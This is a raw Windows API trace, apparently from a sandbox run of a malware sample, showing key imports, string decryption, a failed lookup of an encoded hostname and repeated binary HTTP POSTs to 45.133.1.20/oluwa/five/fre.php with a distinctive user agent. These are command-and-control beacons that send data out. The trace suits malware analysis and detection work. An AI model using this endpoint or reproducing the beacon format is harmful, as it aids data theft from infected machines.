0x6b3670 [0170.035] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.036] GetProcessHeap () returned 0x6a0000 [0170.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0170.046] GetProcessHeap () returned 0x6a0000 [0170.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.046] GetProcessHeap () returned 0x6a0000 [0170.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.047] GetProcessHeap () returned 0x6a0000 [0170.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0170.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0170.071] GetProcessHeap () returned 0x6a0000 [0170.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.072] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0170.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.076] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.142] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.142] GetProcessHeap () returned 0x6a0000 [0170.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.145] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0170.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.147] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0170.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.148] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0170.148] GetProcessHeap () returned 0x6a0000 [0170.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0170.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0170.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.151] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0170.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.153] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0170.153] GetProcessHeap () returned 0x6a0000 [0170.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0170.153] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba258*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0170.153] GetProcessHeap () returned 0x6a0000 [0170.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0170.153] socket (af=2, type=1, protocol=6) returned 0x340 [0170.154] connect (s=0x340, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0170.187] FreeAddrInfoW (pAddrInfo=0x6ba258*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0170.187] GetProcessHeap () returned 0x6a0000 [0170.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0170.187] GetProcessHeap () returned 0x6a0000 [0170.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0170.188] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.189] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0170.189] GetProcessHeap () returned 0x6a0000 [0170.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0170.194] GetProcessHeap () returned 0x6a0000 [0170.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.194] GetProcessHeap () returned 0x6a0000 [0170.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0170.194] GetProcessHeap () returned 0x6a0000 [0170.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0170.196] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.197] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0170.197] GetProcessHeap () returned 0x6a0000 [0170.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0170.197] GetProcessHeap () returned 0x6a0000 [0170.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.198] send (s=0x340, buf=0x6bbd20*, len=242, flags=0) returned 242 [0170.199] send (s=0x340, buf=0x6bb998*, len=159, flags=0) returned 159 [0170.199] GetProcessHeap () returned 0x6a0000 [0170.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0170.199] recv (in: s=0x340, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0170.277] GetProcessHeap () returned 0x6a0000 [0170.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0170.279] GetProcessHeap () returned 0x6a0000 [0170.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0170.280] GetProcessHeap () returned 0x6a0000 [0170.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0170.280] GetProcessHeap () returned 0x6a0000 [0170.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0170.281] closesocket (s=0x340) returned 0 [0170.282] GetProcessHeap () returned 0x6a0000 [0170.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0170.282] GetProcessHeap () returned 0x6a0000 [0170.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.282] GetProcessHeap () returned 0x6a0000 [0170.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.283] GetProcessHeap () returned 0x6a0000 [0170.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0170.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1e0) returned 0x340 [0170.299] Sleep (dwMilliseconds=0xea60) [0170.300] GetProcessHeap () returned 0x6a0000 [0170.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0170.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0170.317] GetProcessHeap () returned 0x6a0000 [0170.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba770 [0170.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.319] CryptImportKey (in: hProv=0x6bf168, pbData=0x6ba770, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0170.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.320] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.326] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.326] GetProcessHeap () returned 0x6a0000 [0170.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba770 | out: hHeap=0x6a0000) returned 1 [0170.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.327] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0170.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.328] CryptDestroyKey (hKey=0x6ad060) returned 1 [0170.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.331] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0170.331] GetProcessHeap () returned 0x6a0000 [0170.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.332] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.333] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.334] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.336] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.336] GetProcessHeap () returned 0x6a0000 [0170.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.336] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.336] GetProcessHeap () returned 0x6a0000 [0170.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0170.337] GetProcessHeap () returned 0x6a0000 [0170.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.337] GetProcessHeap () returned 0x6a0000 [0170.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.337] GetProcessHeap () returned 0x6a0000 [0170.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0170.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.339] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0170.355] GetProcessHeap () returned 0x6a0000 [0170.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.357] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0170.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.358] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.359] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.359] GetProcessHeap () returned 0x6a0000 [0170.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.362] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0170.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.363] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0170.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.365] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0170.365] GetProcessHeap () returned 0x6a0000 [0170.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.366] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0170.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.367] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0170.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.368] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0170.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0170.371] GetProcessHeap () returned 0x6a0000 [0170.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0170.371] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba5c8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea18*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0170.371] GetProcessHeap () returned 0x6a0000 [0170.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0170.371] socket (af=2, type=1, protocol=6) returned 0x344 [0170.371] connect (s=0x344, name=0x6bea18*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0170.395] FreeAddrInfoW (pAddrInfo=0x6ba5c8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea18*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0170.395] GetProcessHeap () returned 0x6a0000 [0170.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0170.395] GetProcessHeap () returned 0x6a0000 [0170.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0170.396] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.397] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0170.397] GetProcessHeap () returned 0x6a0000 [0170.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0170.397] GetProcessHeap () returned 0x6a0000 [0170.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.398] GetProcessHeap () returned 0x6a0000 [0170.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0170.398] GetProcessHeap () returned 0x6a0000 [0170.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0170.399] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.400] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0170.400] GetProcessHeap () returned 0x6a0000 [0170.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0170.400] GetProcessHeap () returned 0x6a0000 [0170.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.402] send (s=0x344, buf=0x6bbd20*, len=242, flags=0) returned 242 [0170.402] send (s=0x344, buf=0x6bb998*, len=159, flags=0) returned 159 [0170.403] GetProcessHeap () returned 0x6a0000 [0170.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0170.403] recv (in: s=0x344, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0170.505] GetProcessHeap () returned 0x6a0000 [0170.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0170.506] GetProcessHeap () returned 0x6a0000 [0170.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.506] GetProcessHeap () returned 0x6a0000 [0170.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0170.506] GetProcessHeap () returned 0x6a0000 [0170.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0170.507] closesocket (s=0x344) returned 0 [0170.508] GetProcessHeap () returned 0x6a0000 [0170.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0170.508] GetProcessHeap () returned 0x6a0000 [0170.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.508] GetProcessHeap () returned 0x6a0000 [0170.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0170.509] GetProcessHeap () returned 0x6a0000 [0170.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0170.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbd0) returned 0x344 [0170.511] Sleep (dwMilliseconds=0xea60) [0170.513] GetProcessHeap () returned 0x6a0000 [0170.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0170.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.522] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0170.528] GetProcessHeap () returned 0x6a0000 [0170.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.530] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0170.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.531] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.532] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.532] GetProcessHeap () returned 0x6a0000 [0170.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.534] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0170.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.535] CryptDestroyKey (hKey=0x6ad020) returned 1 [0170.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.536] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0170.536] GetProcessHeap () returned 0x6a0000 [0170.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.537] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.538] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.539] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.540] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.540] GetProcessHeap () returned 0x6a0000 [0170.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0170.540] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.540] GetProcessHeap () returned 0x6a0000 [0170.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0170.545] GetProcessHeap () returned 0x6a0000 [0170.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.546] GetProcessHeap () returned 0x6a0000 [0170.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: 